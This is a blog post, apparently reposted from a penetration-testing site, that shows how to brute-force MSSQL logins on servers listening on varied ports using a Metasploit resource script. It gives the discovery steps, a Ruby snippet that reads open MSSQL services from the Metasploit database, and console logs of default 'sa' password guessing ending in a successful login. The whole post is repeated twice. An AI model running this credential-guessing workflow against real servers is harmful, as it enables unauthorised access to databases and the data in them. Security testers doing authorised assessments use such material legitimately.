MSSQL Brute forcing with Resource Scripts from carnal0wnage
MSSQL Brute forcing with Resource Scripts
How can we brute force MSSQL servers that listen on several different ports without having to manually change the RPORT?
*MSF Pro/Express handle this for you using the database.
Possible Solution:
Use a resource script to populate the values for us.
This will work but we have to get the data in there.
1. Set up the database for metasploit
2. Get a list of servers
OSQL -L
Servers:
SEVERNAME1\SQL2000
SEVERNAME2\SQL2005
OSQL will give you a list of hostnames, we need to turn these hostnames into IP addresses/ranges for mssql_ping.
You can use post/windows/recon/resolve_hostname to a list of hostnames and turn these into IP addresses.
msf post(resolve_hostname) > run
[*] www.google.com resolves to 173.194.73.106
[*] www.example.com resolves to 192.0.43.10
[-] Failed to resolve test.local
[*] DC1 resolves to 172.16.10.10
[*] SEVERNAME1 resolves to 192.168.237.197
[*] SEVERNAME2 resolves to 192.168.237.211
[*] Post module execution completed
with a list of IP addresses...do mssql_ping
msf auxiliary(mssql_ping) > run
[*] SQL Server information for 192.168.237.197:
[+] InstanceName = MSSQLSERVER
[+] IsClustered = No
[+] tcp = 1433
[+] np = \\servername1\pipe\sql\query
[+] Version = 8.00.194
[+] ServerName = SEVERNAME1
[*] SQL Server information for 192.168.237.211:
[+] InstanceName = INSTANCE1
[+] IsClustered = Yes
[+] tcp = 2261
[+] np = \\servername2\pipe\MSSQL$INSTANCE1\sql\query
[+] Version = 10.50.1600.1
[+] ServerName = SEVERNAME2
Now we can pull tcp ports out using the db query use the resource script to set the RHOST and RPORT for you per entry. weeeeeee
the query:
begin
framework.db.services.each do |service|
if ( service.name =~ /mssql/i and service.state == 'open' and service.proto == 'tcp')
hosts << {'ip' => service.host.address, 'port' => service.port}
end
end
We can use that query to populate stuff on the fly for us.
example:
[*] Processing mssql_brute.rb for ERB directives.
[*]resource (mssql_brute.rb)> Ruby Code (932 bytes)
USERPASS_FILE => /opt/framework/mssql2.txt
RHOSTS => 192.168.237.197
RPORT => 1433
BRUTEFORCE_SPEED => 2
BLANK_PASSWORDS => false
USER_AS_PASS => false
[*]192.168.237.197:1433 - MSSQL - Starting authentication scanner.
[*]192.168.237.197:1433 MSSQL - [1/6] - Trying username:'sa' with password:''
[-]192.168.237.197:1433 MSSQL - [1/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [2/6] - Trying username:'sa' with password:'sa'
[-]192.168.237.197:1433 MSSQL - [2/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [3/6] - Trying username:'sa' with password:'password'
[-]192.168.237.197:1433 MSSQL - [3/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [4/6] - Trying username:'sa' with password:'sql'
[-]192.168.237.197:1433 MSSQL - [4/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [5/6] - Trying username:'sa' with password:'database'
[-]192.168.237.197:1433 MSSQL - [5/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [6/6] - Trying username:'sa' with password:'mssql'
[-]192.168.237.197:1433 MSSQL - [6/6] - failed to login as 'sa'
RHOSTS => 192.168.237.211
RPORT => 2261
BRUTEFORCE_SPEED => 2
BLANK_PASSWORDS => false
USER_AS_PASS => false
[*]192.168.237.211:2261 - MSSQL - Starting authentication scanner.
[*]192.168.237.211:2261 MSSQL - [1/6] - Trying username:'sa' with password:''
[-]192.168.237.211:2261 MSSQL - [1/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [2/6] - Trying username:'sa' with password:'sa'
[-]192.168.237.211:2261 MSSQL - [2/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [3/6] - Trying username:'sa' with password:'password'
[-]192.168.237.211:2261 MSSQL - [3/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [4/6] - Trying username:'sa' with password:'sql'
[-]192.168.237.211:2261 MSSQL - [4/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [5/6] - Trying username:'sa' with password:'database'
[+]192.168.237.211:2261 - MSSQL - successful login 'sa' : 'database'
[*]192.168.237.211:2261 MSSQL - [6/6] - Trying username:'sa' with password:'mssql'
[-]192.168.237.211:2261 MSSQL - [6/6] - failed to login as 'sa'
[*]Scanned 1 of 1 hosts (100% complete)
[*]Auxiliary module execution completed
code is available here:
https://github.com/carnal0wnage/Metasploit-Code/blob/master/scripts/resource/mssql_brute.rb
lots of other resource scripts are in the scripts/resources directory in your msf install.
https://github.com/rapid7/metasploit-framework/tree/master/scripts/resource
*MSF Pro/Express handle this for you using the database.
Possible Solution:
Use a resource script to populate the values for us.
This will work but we have to get the data in there.
1. Set up the database for metasploit
2. Get a list of servers
OSQL -L
Servers:
SEVERNAME1\SQL2000
SEVERNAME2\SQL2005
You can use post/windows/recon/resolve_hostname to a list of hostnames and turn these into IP addresses.
msf post(resolve_hostname) > run
[*] www.google.com resolves to 173.194.73.106
[*] www.example.com resolves to 192.0.43.10
[-] Failed to resolve test.local
[*] DC1 resolves to 172.16.10.10
[*] SEVERNAME1 resolves to 192.168.237.197
[*] SEVERNAME2 resolves to 192.168.237.211
[*] Post module execution completed
with a list of IP addresses...do mssql_ping
msf auxiliary(mssql_ping) > run
[*] SQL Server information for 192.168.237.197:
[+] InstanceName = MSSQLSERVER
[+] IsClustered = No
[+] tcp = 1433
[+] np = \\servername1\pipe\sql\query
[+] Version = 8.00.194
[+] ServerName = SEVERNAME1
[*] SQL Server information for 192.168.237.211:
[+] InstanceName = INSTANCE1
[+] IsClustered = Yes
[+] tcp = 2261
[+] np = \\servername2\pipe\MSSQL$INSTANCE1\sql\query
[+] Version = 10.50.1600.1
[+] ServerName = SEVERNAME2
Now we can pull tcp ports out using the db query use the resource script to set the RHOST and RPORT for you per entry. weeeeeee
the query:
begin
framework.db.services.each do |service|
if ( service.name =~ /mssql/i and service.state == 'open' and service.proto == 'tcp')
hosts << {'ip' => service.host.address, 'port' => service.port}
end
end
We can use that query to populate stuff on the fly for us.
example:
[*] Processing mssql_brute.rb for ERB directives.
[*]resource (mssql_brute.rb)> Ruby Code (932 bytes)
USERPASS_FILE => /opt/framework/mssql2.txt
RHOSTS => 192.168.237.197
RPORT => 1433
BRUTEFORCE_SPEED => 2
BLANK_PASSWORDS => false
USER_AS_PASS => false
[*]192.168.237.197:1433 - MSSQL - Starting authentication scanner.
[*]192.168.237.197:1433 MSSQL - [1/6] - Trying username:'sa' with password:''
[-]192.168.237.197:1433 MSSQL - [1/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [2/6] - Trying username:'sa' with password:'sa'
[-]192.168.237.197:1433 MSSQL - [2/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [3/6] - Trying username:'sa' with password:'password'
[-]192.168.237.197:1433 MSSQL - [3/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [4/6] - Trying username:'sa' with password:'sql'
[-]192.168.237.197:1433 MSSQL - [4/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [5/6] - Trying username:'sa' with password:'database'
[-]192.168.237.197:1433 MSSQL - [5/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [6/6] - Trying username:'sa' with password:'mssql'
[-]192.168.237.197:1433 MSSQL - [6/6] - failed to login as 'sa'
RHOSTS => 192.168.237.211
RPORT => 2261
BRUTEFORCE_SPEED => 2
BLANK_PASSWORDS => false
USER_AS_PASS => false
[*]192.168.237.211:2261 - MSSQL - Starting authentication scanner.
[*]192.168.237.211:2261 MSSQL - [1/6] - Trying username:'sa' with password:''
[-]192.168.237.211:2261 MSSQL - [1/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [2/6] - Trying username:'sa' with password:'sa'
[-]192.168.237.211:2261 MSSQL - [2/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [3/6] - Trying username:'sa' with password:'password'
[-]192.168.237.211:2261 MSSQL - [3/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [4/6] - Trying username:'sa' with password:'sql'
[-]192.168.237.211:2261 MSSQL - [4/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [5/6] - Trying username:'sa' with password:'database'
[+]192.168.237.211:2261 - MSSQL - successful login 'sa' : 'database'
[*]192.168.237.211:2261 MSSQL - [6/6] - Trying username:'sa' with password:'mssql'
[-]192.168.237.211:2261 MSSQL - [6/6] - failed to login as 'sa'
[*]Scanned 1 of 1 hosts (100% complete)
[*]Auxiliary module execution completed
code is available here:
https://github.com/carnal0wnage/Metasploit-Code/blob/master/scripts/resource/mssql_brute.rb
lots of other resource scripts are in the scripts/resources directory in your msf install.
https://github.com/rapid7/metasploit-framework/tree/master/scripts/resource
Source-
http://carnal0wnage.attackresearch.com/2013/01/mssql-brute-forcing-with-resource.html